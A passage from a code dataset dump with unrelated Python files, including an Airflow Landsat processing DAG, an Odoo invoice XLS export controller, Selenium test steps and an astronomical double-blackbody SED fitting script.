# it the sum is bigger than this one, the triangle is valid\n if sum > A[i]:\n sum += A[i]\n # update the longest perimeter\n if sum > longest_perimeter:\n longest_perimeter = sum\n return longest_perimeter\n\ninput1 = [2,1,2]\ninput2 = [1,2,1]\ninput3 = 
[3,2,3,4]\ninput4 = [3,6,2,3]\nprint(largestPerimeter(input4))\n","sub_path":"LeetCode-Python/976 Largest Perimeter Triangle.py","file_name":"976 Largest Perimeter Triangle.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"577210419","text":"from behave import when, then\nfrom selenium.webdriver.common.by import By\n\nHELP_SEARCH = (By.ID, 'helpsearch')\nSEARCH_ICON = (By.CSS_SELECTOR, \"input.a-button-input\")\nHELP_CONTENT = (By.CSS_SELECTOR, \"div.help-content h1\")\n\n\n@when('Search for \"Cancel order\" and Click Go')\ndef search_help(context):\n search_help_field = context.driver.find_element(*HELP_SEARCH)\n search_help_field.clear()\n search_help_field.send_keys(\"Cancel order\")\n context.driver.find_element(*SEARCH_ICON).click()\n\n\n@then('Verify that \"Cancel Items or Orders\" text is present')\ndef verify_result(context):\n result_text = context.driver.find_element(*HELP_CONTENT).text\n assert \"Cancel Items or Orders\" in result_text\n","sub_path":"features/steps/help_page_steps.py","file_name":"help_page_steps.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"303167529","text":"\"\"\"\nRun ARD NRT provisional pipeline for Landsat in Airflow.\n\"\"\"\nimport logging\nfrom datetime import datetime, timedelta\n\nfrom kubernetes.client.models import V1Volume, V1VolumeMount\nfrom kubernetes.client import models as k8s\n\nfrom airflow import DAG\nfrom airflow.kubernetes.secret import Secret\nfrom airflow.providers.cncf.kubernetes.operators.kubernetes_pod import (\n KubernetesPodOperator,\n)\n\nfrom infra.images import WAGL_IMAGE_POC\nfrom infra.pools import WAGL_TASK_POOL\nfrom infra.sns_topics import PUBLISH_ARD_NRT_LS_SNS\nfrom infra.sqs_queues import ARD_NRT_LS_PROCESS_SCENE_QUEUE\nfrom infra.variables import ARD_NRT_LS_CREDS\n\n_LOG = logging.getLogger()\n\ndefault_args = {\n \"owner\": \"Imam Alam\",\n \"depends_on_past\": False,\n \"start_date\": datetime(2021, 6, 1),\n \"email\": [\"imam.alam@ga.gov.au\"],\n \"email_on_failure\": False,\n \"email_on_retry\": False,\n \"retries\": 0,\n \"retry_delay\": timedelta(minutes=5),\n \"pool\": WAGL_TASK_POOL,\n \"secrets\": [\n Secret(\"env\", None, ARD_NRT_LS_CREDS),\n Secret(\"env\", None, \"modtran-key\"),\n ],\n}\n\nESTIMATED_COMPLETION_TIME = 3 * 60 * 60\n\nBUCKET_REGION = \"ap-southeast-2\"\nS3_PREFIX = \"s3://dea-public-data/baseline/\"\nEXPLORER_URL = \"https://explorer-aws.dea.ga.gov.au\"\n\nMAX_ACTIVE_RUNS = 80\n\naffinity = {\n \"nodeAffinity\": {\n \"requiredDuringSchedulingIgnoredDuringExecution\": {\n \"nodeSelectorTerms\": [\n {\n \"matchExpressions\": [\n {\n \"key\": \"nodegroup\",\n \"operator\": \"In\",\n \"values\": [\n \"memory-optimised-wagl-s2-nrt-r5-l\",\n ],\n }\n ]\n }\n ]\n }\n }\n}\n\ntolerations = [\n {\"key\": \"dedicated\", \"operator\": \"Equal\", \"value\": \"wagl\", \"effect\": \"NoSchedule\"}\n]\n\nancillary_volume_mount = V1VolumeMount(\n name=\"wagl-nrt-ancillary-volume\",\n mount_path=\"/ancillary\",\n sub_path=None,\n read_only=False,\n)\n\nancillary_volume = V1Volume(\n name=\"wagl-nrt-ancillary-volume\",\n persistent_volume_claim=k8s.V1PersistentVolumeClaimVolumeSource(\n claim_name=\"wagl-nrt-ancillary-volume\"\n ),\n)\n\npipeline = DAG(\n \"k8s_ard_nrt_landsat_provisional\",\n doc_md=__doc__,\n default_args=default_args,\n description=\"DEA Landsat ARD NRT processing (provisional)\",\n 
concurrency=MAX_ACTIVE_RUNS,\n max_active_runs=MAX_ACTIVE_RUNS,\n catchup=False,\n params={},\n schedule_interval=timedelta(minutes=1),\n tags=[\"k8s\", \"dea\", \"psc\", \"ard\", \"wagl\", \"nrt\", \"landsat\", \"provisional\"],\n)\n\nwith pipeline:\n RUN = KubernetesPodOperator(\n namespace=\"processing\",\n name=\"dea-ard-nrt-landsat-provisional\",\n task_id=\"dea-ard-nrt-landsat-provisional\",\n image_pull_policy=\"IfNotPresent\",\n image=WAGL_IMAGE_POC,\n affinity=affinity,\n tolerations=tolerations,\n startup_timeout_seconds=600,\n cmds=[\"/scripts/aws-process-scene-landsat.sh\"],\n arguments=[\n ARD_NRT_LS_PROCESS_SCENE_QUEUE,\n S3_PREFIX,\n PUBLISH_ARD_NRT_LS_SNS,\n EXPLORER_URL,\n ],\n labels={\n \"runner\": \"airflow\",\n \"product\": \"Landsat\",\n \"app\": \"nrt\",\n \"stage\": \"wagl\",\n },\n env_vars=dict(\n MODTRAN_DATA=\"/ancillary/MODTRAN6.0.2.3G/DATA\",\n ),\n get_logs=True,\n resources={\n \"request_cpu\": \"1000m\",\n \"request_memory\": \"12Gi\",\n },\n volumes=[ancillary_volume],\n volume_mounts=[ancillary_volume_mount],\n execution_timeout=timedelta(minutes=180),\n is_delete_operator_pod=True,\n )\n","sub_path":"dags/ard/k8s_ard_nrt_landsat_provisional.py","file_name":"k8s_ard_nrt_landsat_provisional.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"104178532","text":"from django.conf.urls import url\nfrom . import views\nurlpatterns = [\n url(r\"^$\",views.order1),\n url(r\"^all\",views.all_order_list),\n url(r\"^payend\",views.payend_list),\n url(r\"^nopay\",views.nopay_list),\n url(r\"^delete\",views.deleteit),\n url(r\"^cancel\",views.cancelit),\n]","sub_path":"scooping/order/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"653399279","text":"import math\nimport pyqtgraph as pg\n\nt = range(0,100)\nx = [0] * len(t)\ny = [0] * len(t)\n\nfor idx, val in enumerate(t):\n\tx[idx] = float(val) * 0.01\n\ty[idx] = math.sin(2 * math.pi * x[idx])\n\t\np = pg.plot(x,y)\n\nwin = pg.GraphicsWindow()\nwin.addPlot(p)\n\npg.show()\n\nprint(x)\nprint(y)\n","sub_path":"Graph/real_time.py","file_name":"real_time.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"596900374","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. 
See LICENSE file for full copyright and licensing details.\n\nfrom collections import deque\nimport json\n\nfrom odoo import http\nfrom odoo.http import request\nfrom odoo.tools import ustr\nfrom odoo.tools.misc import xlwt\n\nfrom datetime import datetime\nfrom datetime import date\nimport ast\n\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass SalesReportByInvoice(http.Controller):\n\n\t@http.route('/web/export_xls/sales_report_by_invoice', type='http', auth=\"user\")\n\tdef export_xls(self, filename, date_from, date_to, **kw):\n\t\tworkbook = xlwt.Workbook()\n\t\tworksheet = workbook.add_sheet('Sales Report By Invoice')\n\n\t\tinvoice_ids = request.env['account.invoice'].sudo().search([('date_invoice','>=',date_from),('date_invoice','<=',date_to)],order='date_invoice desc')\n\n\t\t# STYLES\n\t\tstyle_header_bold = xlwt.easyxf(\"font: bold on;font: name Calibri;align: wrap no\")\n\t\tstyle_header_right = xlwt.easyxf(\"font: name Calibri;align: horiz right, wrap no\")\n\t\tstyle_table_header_bold = xlwt.easyxf(\"font: bold on;font: name Calibri;align: horiz centre, vert centre, wrap on;borders: top thin, bottom thin, right thin;\")\n\t\tstyle_table_row = xlwt.easyxf(\"font: name Calibri;align: horiz left, wrap no;borders: top thin, bottom thin, right thin;\")\n\t\tstyle_table_row_amount = xlwt.easyxf(\"font: name Calibri;align: horiz right, wrap no;borders: top thin, bottom thin, right thin;\", num_format_str=\"#,##0.00\")\n\t\tstyle_table_total = xlwt.easyxf(\"pattern: pattern solid, fore_colour pale_blue;font: bold on;font: name Calibri;align: horiz left, wrap no;borders: top thin, bottom medium, right thin;\")\n\t\tstyle_table_total_value = xlwt.easyxf(\"pattern: pattern solid, fore_colour pale_blue;font: bold on;font: name Calibri;align: horiz right, wrap no;borders: top thin, bottom medium, right thin;\", num_format_str=\"#,##0.00\")\n\t\tstyle_end_report = xlwt.easyxf(\"font: bold on;font: name Calibri;align: horiz left, wrap no;\")\n\t\tworksheet.col(0).width = 300*12\n\t\tworksheet.col(1).width = 300*12\n\t\tworksheet.col(2).width = 500*12\n\t\tworksheet.col(3).width = 500*12\n\t\tworksheet.col(4).width = 250*12\n\t\tworksheet.col(5).width = 250*12\n\t\tworksheet.col(6).width = 250*12\n\t\tworksheet.col(7).width = 300*12\n\t\tworksheet.col(8).width = 250*12\n\n\t\t# TEMPLATE HEADERS\n\n\t\t# TABLE HEADER\n\t\tworksheet.write(0, 0, 'CITY', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 1, 'AREA', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 2, 'SALES AGENT', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 3, \"CLIENT'S NAME\", style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 4, 'TERMS', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 5, 'DUE DATE', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 6, 'INVOICE DATE', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 7, 'INVOICE NO.', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 8, 'AMOUNT', style_table_header_bold) # HEADER\n\t\t\n\t\trow_count = 1\n\n\t\tfor invoice in invoice_ids:\n\t\t\t\n\n\t\t\tworksheet.write(row_count, 0, invoice.partner_id.city or '', style_table_row) \n\t\t\tworksheet.write(row_count, 1, invoice.partner_id.partner_area_id.name or '', style_table_row) \n\t\t\tworksheet.write(row_count, 2, invoice.user_id.name or '', style_table_row) \n\t\t\tworksheet.write(row_count, 3, invoice.partner_id.name or '', style_table_row) \n\t\t\tworksheet.write(row_count, 4, invoice.payment_term_id.name or '', style_table_row) 
\n\t\t\tworksheet.write(row_count, 5, invoice.date_due or '', style_table_row) \n\t\t\tworksheet.write(row_count, 6, invoice.date_invoice or '', style_table_row) \n\t\t\tworksheet.write(row_count, 7, invoice.number or '', style_table_row) \n\t\t\tworksheet.write(row_count, 8, invoice.amount_total or '', style_table_row_amount) \n\t\t\trow_count +=1\n\t \n\n\t\tresponse = request.make_response(None,\n\t\t\theaders=[('Content-Type', 'application/vnd.ms-excel'),\n\t\t\t\t\t('Content-Disposition', 'attachment; filename=%s;'%(filename)\n\t\t\t\t\t)])\n\n\t\tworkbook.save(response.stream)\n\n\t\treturn response\n","sub_path":"indigo_prod/controllers/sales_report_by_invoice.py","file_name":"sales_report_by_invoice.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"437009094","text":"#!/usr/bin/env python3\n# Author: Simeon Reusch (simeon.reusch@desy.de)\n# License: BSD-3-Clause\n\nimport logging, os, argparse, time, json\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nfrom astropy import units as u\nimport matplotlib.pyplot as plt\nimport json\nfrom modelSED import utilities, fit, sncosmo_spectral_v13\nfrom modelSED.utilities import broken_powerlaw_spectrum, FNU\nfrom astropy.cosmology import Planck15 as cosmo\n\n# from modelSED.fit import powerlaw_minimizer\nfrom lmfit import Model, Parameters, Minimizer, report_fit, minimize\n\nnice_fonts = {\n \"text.usetex\": True,\n \"font.family\": \"serif\",\n \"font.serif\": \"Times New Roman\",\n}\nmatplotlib.rcParams.update(nice_fonts)\n\nLIGHTCURVE_INFILE = os.path.join(\"data\", \"lightcurves\", \"full_lightcurve.csv\")\n\n# MJD_INTERVALS = [[58700, 58720], [59006, 59032], [59110, 59130], [59220,59265]]\nMJD_INTERVALS = [[58700, 58720], [59006, 59130], [59220, 59271]]\n\n# FITPARAMS_FILE = os.path.join(\"data\", \"fitparams_late_epoch.json\")\nMJD = 59005.12846212167\nREDSHIFT = 0.2666\nFONTSIZE = 12\nFONTSIZE_LABEL = 13\nFONTSIZE_LEGEND = 5\nANNOTATION_FONTSIZE = 8\nFONTSIZE_TICKMARKS = 9\nFIG_WIDTH = 6\nDPI = 400\nINSTRUMENT_DATA_DIR = \"instrument_data\"\nPLOTDIR = os.path.join(\"plots\", \"double_blackbody\")\nFITDIR = os.path.join(\"fit\", \"double_blackbody\")\n\n## EXTINCTION FROM EPOCH 1\n# GLOBAL_AV = 1.48477495\n# GLOBAL_RV = 3.93929588\n\n## EXTINCTION FROM EPOCH 0\nGLOBAL_AV = 0.3643711523794127\nGLOBAL_RV = 4.2694173002543225\n\nFITMETHOD = \"lm\"\n\nREFIT = True\nFIT = 3\nINTERVALS = [0]\nEXTINCTIONFIT_INTERVAL = 4\n\n\nfor directory in [PLOTDIR, FITDIR]:\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef load_info_json(filename: str):\n with open(os.path.join(INSTRUMENT_DATA_DIR, filename + \".json\")) as json_file:\n outfile = json.load(json_file)\n return outfile\n\n\ndef double_blackbody_minimizer(params, x, data=None, data_err=None, **kwargs):\n \"\"\" \"\"\"\n filter_wl = utilities.load_info_json(\"filter_wl\")\n\n wl_filter = {v: k for k, v in filter_wl.items()}\n\n temp1 = params[\"temp1\"]\n scale1 = params[\"scale1\"]\n if FIT == 3:\n temp2 = params[\"temp2\"]\n scale2 = params[\"scale2\"]\n if \"extinction_av\" in params:\n extinction_av = params[\"extinction_av\"]\n elif INTERVAL != EXTINCTIONFIT_INTERVAL:\n extinction_av = GLOBAL_AV\n else:\n extinction_av = None\n\n if \"extinction_rv\" in params:\n extinction_rv = params[\"extinction_rv\"]\n elif INTERVAL != EXTINCTIONFIT_INTERVAL:\n extinction_rv = GLOBAL_RV\n else:\n extinction_rv = None\n\n redshift = REDSHIFT\n\n spectrum1 = 
utilities.blackbody_spectrum(\n temperature=temp1,\n scale=scale1,\n extinction_av=extinction_av,\n extinction_rv=extinction_rv,\n redshift=redshift,\n )\n\n if FIT == 3:\n spectrum2 = utilities.blackbody_spectrum(\n temperature=temp2,\n scale=scale2,\n extinction_av=extinction_av,\n extinction_rv=extinction_rv,\n redshift=redshift,\n )\n\n ab_model_list = []\n flux_list = []\n\n flux1 = spectrum1.flux\n if FIT == 3:\n flux2 = spectrum2.flux\n else:\n flux2 = 0\n\n fluxcomb = flux1 + flux2\n spectrum = sncosmo_spectral_v13.Spectrum(\n wave=spectrum1.wave, flux=fluxcomb, unit=FNU\n )\n\n for i in x:\n ab_model = utilities.magnitude_in_band(wl_filter[i], spectrum)\n flux = utilities.abmag_to_flux(ab_model)\n ab_model_list.append(ab_model)\n flux_list.append(flux)\n\n if \"flux\" in kwargs.keys():\n if data:\n return np.asarray(flux_list) - np.asarray(data)\n else:\n return flux_list\n\n if data and not data_err:\n residual = np.asarray(ab_model_list) - np.asarray(data)\n print(residual)\n return residual\n elif data_err:\n residual = (np.asarray(ab_model_list) - np.asarray(data)) / np.asarray(data_err)\n print(residual)\n print(np.mean(abs(residual)))\n print(\"-------------------------------------------\")\n return residual\n else:\n return ab_model_list\n\n\n# BANDS_TO_EXCLUDE = [\"P200+J\", \"P48+ZTF_g\", \"P48+ZTF_r\", \"P48+ZTF_i\", \"Swift+B\", \"Swift+V\"]\n# BANDS_TO_EXCLUDE = [\"P200+J\"]\nBANDS_TO_EXCLUDE = [\n \"P200_sextractor+J\",\n \"P200_sextractor+H\",\n \"P200_sextractor+Ks\",\n \"Swift+B\",\n \"Swift+U\",\n \"Swift+V\",\n]\nBANDS_TO_FIT_BB_1 = [\"P48+ZTF_g\", \"P48+ZTF_r\", \"P48+ZTF_i\", \"Swift+UVM2\"]\nBANDS_TO_FIT_BB_2 = [\"P200+J\", \"P200+H\", \"P200+Ks\", \"WISE+W1\", \"WISE+W2\"]\n\nfor INTERVAL in INTERVALS:\n FITFILENAMES = {\n 1: os.path.join(FITDIR, f\"{INTERVAL}_fitparams_optical_uv.json\"),\n 2: os.path.join(FITDIR, f\"{INTERVAL}_fitparams_infrared.json\"),\n 3: os.path.join(FITDIR, f\"{INTERVAL}_fitparams_all.json\"),\n }\n\n magnitudes = {}\n\n df = pd.read_csv(LIGHTCURVE_INFILE)\n\n df_cut = df.query(\n f\"obsmjd > {MJD_INTERVALS[INTERVAL][0]} and obsmjd < {MJD_INTERVALS[INTERVAL][1]}\"\n )\n\n df_cut[\"telescope_band\"] = df_cut.telescope + \"+\" + df_cut.band\n\n for tband in df_cut[\"telescope_band\"].unique():\n if tband not in BANDS_TO_EXCLUDE:\n _df = df_cut.query(f\"telescope_band == @tband\")\n magnitudes.update(\n {tband: [np.mean(_df.mag.values), np.mean(_df.mag_err.values)]}\n )\n\n columns = [\"instrument\", \"band\", \"mag\", \"mag_err\"]\n df = pd.DataFrame(columns=columns)\n instrument = []\n band = []\n mag = []\n mag_err = []\n for index, entry in enumerate(magnitudes):\n mag.append(magnitudes[entry][0])\n mag_err.append(magnitudes[entry][1])\n instrument.append(entry.split(\"+\")[0])\n band.append(entry.split(\"+\")[1])\n\n df[\"instrument\"] = instrument\n df[\"band\"] = band\n df[\"mag\"] = mag\n df[\"mag_err\"] = mag_err\n df[\"flux\"] = utilities.abmag_to_flux(df.mag)\n df[\"flux_err\"] = utilities.abmag_err_to_flux_err(df.mag, df.mag_err)\n\n filter_wl = load_info_json(\"filter_wl\")\n cmap = load_info_json(\"cmap\")\n filterlabel = load_info_json(\"filterlabel\")\n\n # Now fit the sum of two spectra\n mags = []\n mag_errs = []\n wls = []\n\n df[\"instrumentband\"] = df[\"instrument\"] + \"+\" + df[\"band\"]\n\n if FIT == 1 or FIT == 2:\n df_fit = df.query(f\"instrumentband in @BANDS_TO_FIT_BB_{FIT}\")\n else:\n df_fit = df\n\n for index, row in df_fit.iterrows():\n mags.append(row[\"mag\"])\n mag_errs.append(row[\"mag_err\"])\n 
instrumentband = row[\"instrument\"] + \"+\" + row[\"band\"]\n wls.append(filter_wl[instrumentband])\n\n params = Parameters()\n params.add(\"temp1\", value=14000, min=100, max=150000)\n params.add(\"scale1\", value=1e23, min=1e18, max=1e27)\n\n if FIT == 3:\n params.add(\"temp2\", value=1400, min=100, max=150000)\n params.add(\"scale2\", value=1e20, min=1e18, max=1e27)\n if (FIT == 1 or FIT == 3) and INTERVAL == EXTINCTIONFIT_INTERVAL:\n params.add(\"extinction_av\", value=0.1, min=0.000000001, max=4)\n params.add(\"extinction_rv\", value=3.1, min=1, max=5)\n\n x = wls\n data = mags\n data_err = mag_errs\n\n minimizer_fcn = double_blackbody_minimizer\n\n if REFIT:\n minimizer = Minimizer(\n minimizer_fcn, params, fcn_args=(x, data, data_err), fcn_kws=None\n )\n out = minimizer.minimize(method=FITMETHOD)\n print(report_fit(out.params))\n\n temp1 = out.params[\"temp1\"].value\n scale1 = out.params[\"scale1\"].value\n\n if \"extinction_av\" in out.params.keys():\n extinction_av = out.params[\"extinction_av\"].value\n else:\n extinction_av = None\n if \"extinction_rv\" in out.params.keys():\n extinction_rv = out.params[\"extinction_rv\"].value\n else:\n extinction_rv = None\n if \"temp2\" in out.params.keys():\n temp2 = out.params[\"temp2\"].value\n else:\n temp2 = None\n if \"scale2\" in out.params.keys():\n scale2 = out.params[\"scale2\"].value\n else:\n scale2 = None\n\n fitresult = {\n \"temp1\": temp1,\n \"scale1\": scale1,\n \"temp2\": temp2,\n \"scale2\": scale2,\n \"extinction_av\": extinction_av,\n \"extinction_rv\": extinction_rv,\n }\n\n with open(FITFILENAMES[FIT], \"w\") as outfile:\n json.dump(fitresult, outfile)\n\n else:\n with open(FITFILENAMES[FIT]) as infile:\n fitresult = json.load(infile)\n\n wavelengths, frequencies = utilities.get_wavelengths_and_frequencies()\n\n if INTERVAL == EXTINCTIONFIT_INTERVAL:\n extinction_av = fitresult[\"extinction_av\"]\n extinction_rv = fitresult[\"extinction_rv\"]\n else:\n extinction_av = GLOBAL_AV\n extinction_rv = GLOBAL_RV\n\n fitted_spectrum_1, bolo_flux_1 = utilities.blackbody_spectrum(\n temperature=fitresult[\"temp1\"],\n scale=fitresult[\"scale1\"],\n extinction_av=extinction_av,\n extinction_rv=extinction_rv,\n redshift=REDSHIFT,\n get_bolometric_flux=True,\n )\n unextincted_spectrum_1, bolo_flux_1_unext = utilities.blackbody_spectrum(\n temperature=fitresult[\"temp1\"],\n scale=fitresult[\"scale1\"],\n extinction_av=None,\n extinction_rv=None,\n redshift=None,\n get_bolometric_flux=True,\n )\n\n if FIT == 3:\n fitted_spectrum_2, bolo_flux_2 = utilities.blackbody_spectrum(\n temperature=fitresult[\"temp2\"],\n scale=fitresult[\"scale2\"],\n extinction_av=extinction_av,\n extinction_rv=extinction_rv,\n redshift=REDSHIFT,\n get_bolometric_flux=True,\n )\n unextincted_spectrum_2, bolo_flux_2_unext = utilities.blackbody_spectrum(\n temperature=fitresult[\"temp2\"],\n scale=fitresult[\"scale2\"],\n extinction_av=None,\n extinction_rv=None,\n redshift=None,\n get_bolometric_flux=True,\n )\n\n combined_flux = fitted_spectrum_1.flux + fitted_spectrum_2.flux\n\n combined_spectrum = sncosmo_spectral_v13.Spectrum(\n wave=fitted_spectrum_1.wave, flux=combined_flux, unit=FNU\n )\n\n # # # Calculate luminosity\n luminosity_1, _, radius1, _ = utilities.calculate_bolometric_luminosity(\n temperature=fitresult[\"temp1\"],\n scale=fitresult[\"scale1\"],\n redshift=REDSHIFT,\n temperature_err=None,\n scale_err=None,\n )\n luminosity_2, _, radius2, _ = utilities.calculate_bolometric_luminosity(\n temperature=fitresult[\"temp2\"],\n 
scale=fitresult[\"scale2\"],\n redshift=REDSHIFT,\n temperature_err=None,\n scale_err=None,\n )\n total_luminosity = luminosity_1 + luminosity_2\n\n print(\"--------------------------------\")\n print(f\"temp optical/UV: {fitresult['temp1']:.0f} K\")\n print(f\"temp infrared: {fitresult['temp2']:.0f} K\")\n print(f\"luminosity optical/UV = {luminosity_1:.2e}\")\n print(f\"luminosity infrared = {luminosity_2:.2e}\")\n print(f\"total luminosity = {total_luminosity:.2e}\")\n print(f\"radius optical/UV = {radius1:.2e}\")\n print(f\"radius infrared = {radius2:.2e}\")\n print(\"--------------------------------\")\n\n # Now we plot\n ###\n plotmag = False\n ###\n\n plt.figure(figsize=(FIG_WIDTH, 1 / 1.414 * FIG_WIDTH), dpi=DPI)\n ax1 = plt.subplot(111)\n plt.xscale(\"log\")\n\n if not plotmag:\n ax1.set_ylabel(\n r\"$\\nu$ F$_\\nu$ [erg s$^{-1}$ cm$^{-2}$]\", fontsize=FONTSIZE_LABEL\n )\n ax1.set_xlabel(\"Frequency [Hz] (source frame)\", fontsize=FONTSIZE_LABEL)\n ax1.set_xlim([5e13, 2e15])\n ax1.set_ylim([9e-14, 1e-11])\n # ax1.set_ylim([9e-16, 1e-11])\n plt.yscale(\"log\")\n for band in df.band:\n df_red = df.query(f\"band == '{band}'\")\n key = (df_red.instrument.values + \"+\" + df_red.band.values)[0]\n nu = utilities.lambda_to_nu(filter_wl[key])\n\n ax1.errorbar(\n nu * (1 + REDSHIFT),\n df_red.flux.values * nu * (1 + REDSHIFT),\n df_red.flux_err.values * nu * (1 + REDSHIFT),\n color=cmap[key],\n label=filterlabel[key],\n fmt=\".\",\n markersize=10,\n )\n nu = utilities.lambda_to_nu(fitted_spectrum_1.wave)\n\n # OPTICAL / UV\n ax1.plot(\n utilities.lambda_to_nu(fitted_spectrum_1.wave) * (1 + REDSHIFT),\n fitted_spectrum_1.flux\n * utilities.lambda_to_nu(fitted_spectrum_1.wave)\n * (1 + REDSHIFT),\n color=\"tab:blue\",\n linestyle=\"dotted\",\n label=f\"1 extincted\",\n )\n ax1.plot(\n utilities.lambda_to_nu(unextincted_spectrum_1.wave),\n unextincted_spectrum_1.flux\n * utilities.lambda_to_nu(unextincted_spectrum_1.wave),\n color=\"tab:blue\",\n linestyle=\"dotted\",\n linewidth=0.6,\n label=f\"1 unextincted\",\n )\n\n if FIT == 3:\n ax1.plot(\n utilities.lambda_to_nu(fitted_spectrum_2.wave) * (1 + REDSHIFT),\n fitted_spectrum_2.flux\n * utilities.lambda_to_nu(fitted_spectrum_2.wave)\n * (1 + REDSHIFT),\n color=\"tab:red\",\n linestyle=\"dotted\",\n label=f\"2 extincted\",\n )\n ax1.plot(\n utilities.lambda_to_nu(unextincted_spectrum_2.wave),\n unextincted_spectrum_2.flux\n * utilities.lambda_to_nu(unextincted_spectrum_2.wave),\n color=\"tab:red\",\n linestyle=\"dotted\",\n linewidth=0.6,\n label=f\"2 unextincted\",\n )\n ax1.plot(\n utilities.lambda_to_nu(combined_spectrum.wave) * (1 + REDSHIFT),\n combined_spectrum.flux\n * utilities.lambda_to_nu(combined_spectrum.wave)\n * (1 + REDSHIFT),\n color=\"black\",\n # linestyle=\"dotted\",\n label=rf\"combined spectrum\",\n )\n\n ax2 = ax1.secondary_xaxis(\n \"top\", functions=(utilities.nu_to_ev, utilities.ev_to_nu)\n )\n ax2.set_xlabel(r\"Energy [eV]\", fontsize=FONTSIZE_LABEL)\n plt.grid(which=\"both\", alpha=0.15)\n\n d = cosmo.luminosity_distance(REDSHIFT)\n d = d.to(u.cm).value\n lumi = lambda flux: flux * 4 * np.pi * d ** 2\n flux = lambda lumi: lumi / (4 * np.pi * d ** 2)\n ax3 = ax1.secondary_yaxis(\"right\", functions=(lumi, flux))\n ax3.tick_params(axis=\"y\", which=\"major\", labelsize=FONTSIZE_TICKMARKS)\n ax3.set_ylabel(r\"$\\nu$ L$_\\nu$ [erg s$^{-1}$]\", fontsize=FONTSIZE_LABEL)\n\n else:\n ax1.set_ylabel(\"Magnitude [AB]\", fontsize=FONTSIZE_LABEL)\n ax1.set_xlabel(r\"Wavelength $[\\AA]$\", fontsize=FONTSIZE_LABEL)\n 
ax1.invert_yaxis()\n ax1.set_ylim([21, 15])\n\n for band in df.band:\n df_red = df.query(f\"band == '{band}'\")\n key = (df_red.instrument.values + \"+\" + df_red.band.values)[0]\n ax1.errorbar(\n filter_wl[key],\n df_red.mag.values,\n df_red.mag_err.values,\n color=cmap[key],\n fmt=\".\",\n label=filterlabel[key],\n markersize=10,\n )\n ax1.plot(\n fitted_spectrum_1.wave,\n utilities.flux_to_abmag(fitted_spectrum_1.flux),\n color=\"darkcyan\",\n linestyle=\"dotted\",\n label=\"spectrum 1\",\n )\n\n # ax1.plot(\n # fitted_spectrum_2.wave,\n # utilities.flux_to_abmag(fitted_spectrum_2.flux),\n # color=\"yellowgreen\",\n # linestyle=\"dotted\",\n # label=\"spectrum 2\",\n # )\n # ax1.plot(\n # fitted_total_spectrum.wave,\n # utilities.flux_to_abmag(fitted_total_spectrum.flux),\n # color=\"purple\",\n # # linestyle=\"dotted\",\n # label=\"sum of fitted spectra\",\n # )\n ax2 = ax1.secondary_xaxis(\n \"top\", functions=(utilities.nu_to_lambda, utilities.lambda_to_nu)\n )\n ax2.set_xlabel(\"Frequency [Hz] (source frame)\", fontsize=FONTSIZE_LABEL)\n\n ax1.tick_params(axis=\"both\", which=\"major\", labelsize=FONTSIZE_TICKMARKS)\n ax2.tick_params(axis=\"y\", which=\"major\", labelsize=FONTSIZE_TICKMARKS)\n\n bbox = dict(boxstyle=\"round\", fc=\"w\", ec=\"gray\")\n annotation = f\"lumin. opt/UV: {luminosity_1:.2e}\\nlumin. IR: {luminosity_2:.2e}\\nlumin. total: {total_luminosity:.2e}\"\n ax1.text(\n 0.35,\n 0.9,\n annotation,\n transform=ax1.transAxes,\n bbox=bbox,\n fontsize=FONTSIZE_LEGEND,\n )\n\n if not os.path.exists(PLOTDIR):\n os.makedirs(PLOTDIR)\n\n if plotmag:\n outfile = os.path.join(PLOTDIR, f\"double_bb_mag_{INTERVAL}_sourceframe.png\")\n else:\n outfile = os.path.join(PLOTDIR, f\"double_bb_nufnu_{INTERVAL}_sourceframe.png\")\n\n loc = {0: \"upper left\", 1: \"upper right\", 2: \"upper right\"}\n\n plt.legend(fontsize=FONTSIZE_LEGEND, loc=loc[INTERVAL])\n plt.tight_layout()\n plt.savefig(outfile)\n plt.close()\n","sub_path":"fit/archive/fit_double_blackbody_sourceframe.py","file_name":"fit_double_blackbody_sourceframe.py","file_ext":"py","file_size_in_byte":17271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"207721221","text":"\"\"\"our_controller controller.\"\"\"\n\n# You may need to import some classes of the controller module. 
